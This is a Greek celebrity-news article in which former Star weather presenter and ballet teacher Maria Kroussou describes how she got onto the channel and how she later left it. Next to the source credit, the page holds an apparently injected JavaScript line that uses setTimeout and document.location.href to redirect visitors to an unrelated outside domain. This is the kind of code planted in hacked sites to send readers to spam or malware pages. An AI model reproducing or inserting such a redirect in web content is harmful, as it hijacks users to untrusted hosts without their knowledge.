Μαρία Κρούσσου: Εγώ ήμουν παιδί του κ. Μαλέλη, όταν έφυγε εκείνος… (ΒΙΝΤΕΟ)

0
12

 

Για πολλά χρόνια παρουσίαζε το δελτίο καιρού του Star, ενώ το κύριο επάγγελμα της είναι το μπαλέτο που μέσα από τη σχολή που έχει, το έχει διδάξει ακόμα και στην Έφη Θώδη.

Η Μαρία Κρούσου, μιλώντας στο «Φτιάξε καφέ να στα πω», αποκάλυψε το πώς έφυγε από το Star.

«Εγώ ήμουν «παιδί» του κ. Σταμάτη Μαλέλη. Μόλις έφυγε ο κ. Σταμάτης από το Star και ήρθαν και ο κ. Χατζηνικολάου, η κ. Ζαχαρέα κι όλοι αυτοί, το κανάλι μου ανακοίνωσε ότι δεν θα υπάρχει καιρός. Δεν θέλανε κοπέλα να λέει τον καιρό. Δεν ήθελα να φύγω γιατί αγαπούσα πάρα πολύ το κανάλι και τη δουλειά αυτή», ανέφερε.

Όσο για το πώς βρέθηκε στο Star και στο δελτίο του καιρού δήλωσε: «Είχα μια οικογενειακή φίλη και μου είπε ψάχνω να βρω μοντέλο να κάτσει στη βιτρίνα του ανθοπωλείου μου για τον Άγιο Βαλεντίνου. Της λέω δεν ξέρω καμία, αλλά εγώ μπορώ να κάτσω. Θέλεις; Κι έκατσα δυο μέρες. Από το Star ήρθε και το κάλυψε ο Θέμης Μάλλης. Τον ευχαριστώ πάρα πολύ γιατί με ανέβασε και έτσι μπήκα και στο κανάλι. Ήταν πολύ απλό. Αλλά με δοκίμασαν κιόλας, γιατί μπορεί να μην μπορούσα, γιατί κι εγώ με το μπαλέτο ασχολούμαι, δεν ήξερα. Έπαιξε ρόλο τότε η γνώμη του κ. Δρακάκη και του κ. Κουίκ».

Πηγή: zappit.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here